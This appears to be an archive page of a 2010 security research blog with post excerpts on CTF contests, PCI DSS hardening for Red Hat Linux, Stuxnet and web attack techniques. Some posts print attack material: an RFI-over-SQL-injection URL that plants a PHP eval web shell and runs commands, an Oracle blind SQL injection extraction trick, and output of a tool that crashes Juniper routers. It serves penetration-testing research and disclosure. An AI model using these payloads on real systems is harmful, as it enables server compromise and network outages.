December 30, 2010

SecurityLab.ru summarizes the results of HackQuest 2010 competition

The SecurityLab.ru portal and Positive Technologies company have conducted an open information security competition HackQuest 2010.

Over 750 experts from all over the world participated in it, but only 8 of them managed to go through the entire competition. Not only prizes will be received by the competition leaders, but also job offers from the key information security companies that sponsored the event.

The SecurityLab.ru portal celebrated the tenth anniversary on December 15, 2010. Development of this site devoted to information security started in 2000. During these ten years, SecurityLab.ru has grown up from a small site into the leading information security portal in Russian.

December 15, 2010

Hack Quest 2010 Online

The SecurityLab.ru portal invites all comers to participate in an online information protection contest - Hack Quest 2010. The contestants will try their skills in the field of security assessment, search and exploitation of vulnerabilities, reverse engineering, and just hacking. Prizes are waiting for the winners!

The game infrastructure was not initially planned as an online contest, so, unfortunately, all the interfaces of the contest are in Russian. However, it shall not prevent foreigners from participation :)

December 14, 2010

Google Hall of Fame

The “Google Security Reward” program has attracted attention of many researchers. This program provided them with a legal opportunity to analyze the security of Google services and applications. Researches were allowed to examine not only applications like Google Chrome, but also interactive services: search engine google.com, mail service gmail.com, video service youtube.com, blog service blogger.com, and social network service orkut.com.
The experts from the “Positive Research” Center, which is an innovation department of the Positive Technologies Company, have also joined the program. In the result of analysis performed by the experts of the “Positive Research” Center, several vulnerabilities of various risk levels were detected; these vulnerabilities were than analyzed and eliminated by Google specialists. As a reward for helping make Google products safer, the “Positive Research” Center team was introduced into the virtual Google Security Hall of Fame (http://www.google.com/corporate/halloffame.html).

XSS



Clickjacking

November 22, 2010

PCI DSS and Red Hat Enterprise Linux (Final part #9)

Requirement A.1: Shared hosting providers must protect the cardholder data environment

Abstract

The most obvious method to fulfill the requirements given in section А.1 is to assign a virtual server (or a set of servers) that meets the requirements from the chapters described above to every client .
There are no analogous requirements in the CIS standards

November 8, 2010

PCI DSS and Red Hat Enterprise Linux (Part #8)

Requirement 10: Track and monitor all access to network resources and cardholder data

Abstract

Technically implemented requirements given in this chapter refer to the syslog server, the kernel-level audit system auditd, NTP server settings, and an integrity control system. There are almost no analogous items in CIS standards.

October 20, 2010

PCI DSS and Red Hat Enterprise Linux (Part #7)

Requirement 8: Assign a unique ID to each person with computer access

Summary

Most requirements presented in this chapter concern Linux password policy, which was described in details by CIS.

October 11, 2010

PCI DSS and Red Hat Enterprise Linux (Part #6)


Requirement 7. Limit access to system components and cardholder data to only those individuals whose job requires such access

7.2.1 Examine system settings and vendor documentation to confirm that access control systems are in place on all system components

The previous item was about data access control, and this one concerns user access isolation। Let us consider all widespread mechanisms of user privilege restriction. In examples, there will appear listings of commands executed with the root privileges, a user user for whom various permissions will be set, and a user superadmin who will not have the mentioned permissions in spite of the big name.

September 19, 2010

Fuzzing of a Mod_rewrite "Protected" Site

There is a growing possibility of encountering some sites on the Internet that hide parameters passed to an application using the mod_rewrite Apache module. Often, web developers have an illusion that this can protect a web application against attacks, such as SQL Injection, Cross-Site Scripting, etc. In fact, this is a common delusion, similar to the delusion that hiding “fingerprints” of services improves the security of the services. There is no doubt that the use of mod_rewrite for hiding parameters passed to an application, just as hiding fingerprints, is a certain obstacle for an attacker. However, as they say, “there is no such obstacle that could not be surmounted”.

September 17, 2010

Chaos Constructions 2010 (resume)

At the end of the last month, traditionally takes part computer festival named Chaos Construction 2010. Chaos Constructions (CC) — this annual festival held at the end of August in St.Petersburg. Starting 2006, its format is similar to LAN party format.

CC festival started in 1995 as "demo party" – a competition between programmers, painters and musicians in several nominations, the main one is "demo" – a program with size limitations, that is usually a kind of video file but with animation (it can be used in short fragments). As a rule, demo is a program that can demonstrate realistic 3D graphics via special complex calculations. In most case this is true but earlier (and sometimes now) demo was considered to be a kind of story with special effects are just means to make the story more understandable.

September 3, 2010

PCI DSS and Red Hat Enterprise Linux (Part #5)

Requirement 7. Limit access to system components and cardholder data to only those individuals whose job requires such access

Summary
The both requirements given in this section are rather complex; many sub-systems are involved in configuration of OS in compliance with these requirements. CIS RHEL analogs of the requirement 7.2.1 are contained in items 8.1, 8.2, 8.5, 8.8, 9.2, 9.8, 9.11, SN.7, and SN.11, but these analogs don’t cover all access isolation mechanisms available in the system. Partial CIS analogs of the requirement 7.1.1 are presented in items 7.2 and 7.6.

September 1, 2010

PCI DSS and Red Hat Enterprise Linux (Part #4)


Requirement 4. Encrypt transmission of cardholder data across open, public networks

Summary

In this chapter, data encryption requirements, which have no CIS analogs, are given. The key ideas are: application of tools for VPN channel creation, support of web traffic encryption, and application of certificates.


August 20, 2010

Web Crawler Beta Released!

Web Crawler - first public beta release is out!

Introduction
Crawler is a utility designed for testing and demonstration of the WebEngine open source library features. This program gathers information about the resources of a specified web server by analyzing references in the HTML markup, text, and JavaScript code. Additionally, a query is sent to the Web Of Trust knowledge base to obtain information about the analyzed site. This check demonstrates analysis of web application vulnerabilities.
First and foremost, please do not be evil. Use crawler only against services you own, or have a permission to test. The given application is not a full-fledged analyzer of web application security.

Furthermore, the library is currently not meant for scanning of rogue and misbehaving HTTP servers; in these cases, correct and stable operation cannot be guaranteed.
The main features provided by the application are listed below:
  • JavaScript analysis aimed at receiving references with simulation of a DOM structure
  • Support of the Basic, Digest, and NTLM authorization schemes
  • Access to the contents of web servers via HTTP
  • Operation via proxy servers with various authorization schemes 
  • A wide variety of options to describe the scan target (lists of scanned domains, restriction of scanning to a host, a domain, or a web server directory, etc.)
  • Modular structure, which allows one to implement plug-ins

Web Crawler GUI - Scan Results Example



Web Crawler GUI - Profiles, Plugins

August 6, 2010

PCI DSS and Red Hat Enterprise Linux (Part #3)

Author: Feodor Kulishov

[Part #1] [Part #2]

<...>

Requirement 3: Protect stored cardholder data

3.4.1.а If disk encryption is used, logical access must be managed independently of native operating system access control mechanisms

The essence of the requirement is that access to decrypted data should be allowed only if the key is known; thereby, any processes and users (even system administrators) will not be able to read and modify such data correctly if they will not have the decryption key.

For all widespread mechanisms of encryption of the Linux file systems (cryptsetup, cryptsetup + LUKS, EncFS, eCryptFS), the decrypted file system (FS) is logically identical to the ordinary one and has the same access attributes, ACLs, etc. Thereby, the file system property of transparency is implemented. However, even if the data access rights are specified correctly, the root and the processes with UID=0 will be able to access any data after it will be decrypted by the key owner; is means that the given PCI DSS requirements are not fulfilled for all mechanisms of encryption of the Linux file systems.

August 5, 2010

Another alternative for NULL byte

Undoubtedly, many of you remember that Raz0r brought up the question of alternative for NULL byte about a year ago and the ush group conducted corresponding investigations devoted to this problem [1, 2, and 3]. By the way, yours truly added a new method to the MaxPatrol knowledge base at the same time and supplemented the method implementation with own elaborations [4].

So, why do I touch this topic again? The deal is that the mentioned method was based on the idea to zap the file end (extension), which will in turn get into include. It is possible, because PHP uses path normalization and fails to access a file exceeding the MAX_PATH. Well, why can’t we use the same PHP restrictions (the MAX_PATH value) and try to fill the length of the file name from the beginning of the file? This idea occurred to a young man (Yuri Goltsev), who was asked a relevant question on the job interview. And it must work indeed!

July 21, 2010

Stuxnet attacks! One more Zero-day for Microsoft Windows

In spite of its attack vector, the new worm exploiting a shortcut processing vulnerability becomes very popular. It would seem that this malware distribution vector was to become inefficient long ago, because this method of spreading worms has been used since the time of Elk Cloner (1982). However, 28 years later, we face this attack vector again, but the infection speed has become much higher and the scale has become much wider.

Event Chronology

10.07.2010
The Byelorussian antivirus company VirusBlokAda (VBA) reports detection of a new malicious program.
The US-CERT receives notification of an attack exploiting a 0-day vulnerability in Microsoft Windows.

15.07.2010
Information about the vulnerability becomes publicly available

16.07.2010
Microsoft issues a security bulletin that confirms the vulnerability presence

19.07.2010
An exploit becomes publicly available

July 19, 2010

Red Card: Specificity of PCI DSS in respect to Red Hat Enterprise Linux (Part 2)

Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters

Summary

The requirements presented in this chapter are much more allied to the CIS than those from the previous chapter. The corresponding items of the CIS RHEL are the chapters 3 and 4, paragraphs 2.3, 8.2, 9.4, 11.2, and SN.8. However, it will be necessary to apply external tools, such as port scanners and password crackers, in addition to OS settings.

2.1 Always change vendor-supplied defaults before installing a system on the network

The question is about passwords of network devices and Wi-Fi points of presence, SNMP access strings, etc. The requirement implies manual check (which is absolutely necessary in most cases), but there is an opportunity to avoid the most part of routine works by applying a special network or offline password cracking tool.

July 9, 2010

Red Card: Specificity of PCI DSS in respect to Red Hat Enterprise Linux (Part 1)

Author: Feodor Kulishov

In the present article, we will discuss configuration of a standard Linux system (as well as the standard software supplied with the distribution kit) in accordance with the PCI DSS by examples of RHEL 5 and Fedora Core 12. For each requirement of the standard, recommended system settings will be given based on the existing technical standards (CIS, NIST, SANS) and the experience in configuring such systems.
RedHat Enterprise Linux was chosen to serve as the target Linux distribution kit, because it receives (along with Novell SUSE Enterprise Linux Server/Desktop) the most widespread support of hardware and software vendors and offers a wide variety of commercial support options. This is why the considered system is widely used in the business society, including the payment card industry. FC12 serves as the base for the future RHEL6.
Note. The present publication represents only one point of view on the problem of auditing the compliance with the PCI DSS requirements. Auditors who examine certain data processing systems can have their own vision of secure settings, which may differ from the recommendations given in this article, because some items of the standard may have various explanations. Nevertheless, this work can serve as the starting point to obtain RH systems that are not only compliant with the standard’s requirement, but also have safe configurations.

June 7, 2010

Web application vulnerability statistics 2009

Many years’ assessment practice of the PT Research analytic center and the experience of the Positive Technologies company in penetration testing and information security auditing show that errors in web application protection still are among the most common information security shortcomings. Moreover, web application vulnerabilities represent one of the most widespread ways for attackers to penetrate into enterprise information systems; there is a great number of factors that make web services an attractive target for attacks.

When designing applications, developers usually aim their best efforts at functionality implementation; the problems of information security and code quality are given short shrift. As a result, the overwhelming majority of web applications contain vulnerability of various risk levels.

May 27, 2010

RusCrypto CTF 2010 Full Disclosure

RusCrypto CTF is an open competition in information security held on Capture The Flag principle. At the beginning of the game teams have identical servers with installed vulnerable services.

Besides vulnerabilities in specially designed services, there are vulnerabilities common for real information systems: weak passwords, known vulnerabilities in OS/services, errors in configuration, real vulnerabilities in web applications (such as popular CMS).

During the competition, changes in the system can be made that can lead to additional vulnerabilities to competitors’ services. Competitors’ goal is to detect the vulnerabilities, eliminate them in their servers and do not break the server operation. Competitors also should use similar vulnerabilities on competitors’ servers to capture flags.

May 1, 2010

The RusCrypto’2010 Conference

Last month, the 12th international conference RusCrypto’2010 devoted to the modern cryptology methods, digital signature technologies, and information security systems and tools went off.

The RusCrypto conference represents a place where cryptography and information security experts can communicate. Developers and their potential customers, scientists and officers, specialists of business corporations and public institutions take part in this event. The RusCrypto covers theory and practice, includes presentation of innovative technologies and exchange of views.

April 29, 2010

WASC WSTCv2 Mapping Proposal

While completing vulnerability statistics about Russian web applications in 2009 (it's issued date is too late this year) [1,2,3 in Russian], I suddenly realize that there's no comparison between WASC WSTCv2 and SANS/CWE Top 25 2010 vulnerability titles. As there's No such comparison on the official resource [4], I suggest my own version.

January 25, 2010

Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle

I had gathered an interesting collection of quick methods of blind SQL Injection exploitation, but I was lacking in a similar method for another widespread DBMS – Oracle. It induced me to conduct a small research intended for discovering analogous methods applicable to the specified database.

I found out that all known methods of error-based Blind SQL Injection exploitation don’t work in the Oracle environment. Then, my attention was attracted by the functions of interaction with the XML format. After a short investigation, I found a function XMLType() that returns the first symbol of requested data in the error message (LPX-00XXX):

SQL> select XMLType((select 'abcdef' from dual)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00210: expected '<' instead of 'a'
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 301
ORA-06512: at line 1
no rows selected
SQL>

January 12, 2010

RFI over SQL Injection/Cross-Site Scripting

An amusing attack was demonstrated in the course of the last penetration testing. It is a good example of practical application of Cross-Site Scripting. We had the following situation:

- User segment with an attacker (me) operating from it;
- Technological network with strictly restricted outgoing traffic;
- A web application in the technological network that is vulnerable to Remote File Including (RFI);
- A web application in the technological network that is vulnerable to SQL Injection.

SQL Injection per se didn’t allow us to exploit any useful threats and develop the attack (here it is, the dreadful effect of privilege minimization!). We also could not use the RFI vulnerability, because the traffic outgoing from the technological segment to the user segment and to the external environment was strictly restricted. For the purpose of exploitation of the RFI vulnerability, a chain like the following one was implemented:

http://<application_vulnerable_to_RFI>/?param=http://<application_vulnerable_to_SQLi>/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');

That is, each of these tree vulnerabilities taken separately was useless. Only when they were combined for the common good purpose, they allowed us to exploit an information security threat, which was execution of arbitrary commands on the server :)



All in all, there is nothing supernatural here, but I found this attack to be rather amusing...

January 11, 2010

Magic Quotes


In the course of the last penetration testing, I had an occasion to work with the following web application architecture:

I guess you will ask me, what’s wrong here?

The problem is that Oracle is not MySQL, and it simply doesn’t "know" about any shielding in the form of backlashes :) Oracle doesn’t consider the concept of shielding at all, because it’s a serious DBMS:

Methods of Quick Exploitation of Blind SQL Injection

A couple of days ago TinKode attracted everybody’s attention by breaking a web site in the domain army.mil. The server onestop.army.mil was attacked and the investigator found a Blind SQL Injection vulnerability on it.

A logically true query:



A logically false query:



This time, I was most interested not in the fact of server compromise, but in the applied technique of exploitation of Blind SQL Injection vulnerability at DBMS MSSQL 2000:

January 7, 2010

Juniper JUNOS Remote Kernel Crash Flaw!

"Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic." - The Register news.

The JunOS kernel will crash (i.e. core) when a specifically crafted TCP option is received on a listening TCP port. The packet cannot be filtered with Junos's firewall filter. A router receiving this specific TCP packet will crash and reboot.

Affected Devices:
JunOS 3.x - 10.x (versions released later then 1/28/2009)
Software releases built on or after January 28, 2009 have already fixed the issue.
Solution:
Upgrade the OS. There are no totally effective workarounds.

Funny:
"A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities."
"Because of Juniper's 'Entitled Disclosure Policy,' only our customers and partners are allowed access to the details of the Security Advisory," the spokeswoman wrote.
Ooohhh... How about this: "when a specifically crafted TCP option is received on a listening TCP port"?
It's more than enough! We have 256 guesses ;)

Simple Proof-of-Concept demo:

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
64 bytes from 169.254.1.1: icmp_seq=0 ttl=254 time=4.623 ms
64 bytes from 169.254.1.1: icmp_seq=1 ttl=254 time=4.531 ms
64 bytes from 169.254.1.1: icmp_seq=2 ttl=254 time=4.315 ms
^C<...>

hod# ./hod-junos-test 169.254.1.1 22
[*] Target IP: 169.254.1.1, Port: 22
[+] Sending TCP-packets with various crafted TCP options
[+] TCP options bruteforce progress:
[..........................................................
...........................................................
...........................................................
.......................................................]
[+] OK

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
^C

256 packets and JunOS router is dead, and after analyze sniffing traffic we are know true "evil" TCP packet!

The JUNOS firewall filter (ACL) is unable to filter a TCP packet with this issue!
Successful exploitation requires knowledge of a listening remote TCP port (opened or firewall filtered, it doesn't matter at all).
For example, attackers can send (blind) a many numbers of crafted packets to "well known" TCP ports (22/SSH, 179/BGP and other).
And That's enough.

January 5, 2010

WASC Threat Classification v2.0 is Out!

"The Threat Classification is an effort to classify the weaknesses, and attacks that can lead to the compromise of a website, its data, or its users."

The WASC Threat Classification is a cooperative effort to clarify and organize the threats to the security of a web site. The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language and definitions for web security related issues.

WASC Threat Classification v2.0 Online:
http://projects.webappsec.org/Threat-Classification

What's new in the Threat Classification v2:
* Expanded Mission Statement
* Clarified terminology
* Proper Classification of threats into Attacks and Weaknesses for static/core view
* Base foundation allowing for the introduction of views into future releases.